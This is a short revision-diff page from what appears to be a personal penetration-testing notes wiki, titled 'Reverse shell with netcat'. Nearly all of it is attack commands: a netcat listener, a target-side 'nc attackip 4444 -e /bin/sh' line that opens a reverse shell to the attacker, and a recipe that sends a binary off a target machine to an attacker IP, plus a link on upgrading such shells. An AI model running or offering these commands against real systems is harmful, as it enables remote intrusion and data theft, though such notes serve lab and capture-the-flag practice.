Difference between revisions of "Reverse shell with netcat"

From RHS Wiki
Jump to navigation Jump to search
m
Tag: visualeditor
m
Tag: visualeditor
 
Line 7: Line 7:
 
</syntaxhighlight>
 
</syntaxhighlight>
  
== Transfer file over netcat ==
+
==Transfer file over netcat==
 
<syntaxhighlight lang="bash">
 
<syntaxhighlight lang="bash">
 
$ nc -l -p 9999 > ovrfl  # Receive (Atacker Machine)
 
$ nc -l -p 9999 > ovrfl  # Receive (Atacker Machine)
Line 13: Line 13:
 
$ 0e531949d891fd56a2ead07610cc5ded  ovrfl # Check it is the same on both machines
 
$ 0e531949d891fd56a2ead07610cc5ded  ovrfl # Check it is the same on both machines
 
</syntaxhighlight>
 
</syntaxhighlight>
 +
 +
== Upgrading netcat shells ==
 +
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#method3upgradingfromnetcatwithmagic

Latest revision as of 19:13, 19 January 2020

# Attacbox:
nc -lvnp 4444

# Target:
nc attackip 4444 -e /bin/sh

Transfer file over netcat[edit]

$ nc -l -p 9999 > ovrfl  # Receive (Atacker Machine)
$ nc -w 5 10.10.14.22 9999 < /usr/local/bin/ovrflw  # Send (Target machine)
$ 0e531949d891fd56a2ead07610cc5ded  ovrfl # Check it is the same on both machines

Upgrading netcat shells[edit]

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#method3upgradingfromnetcatwithmagic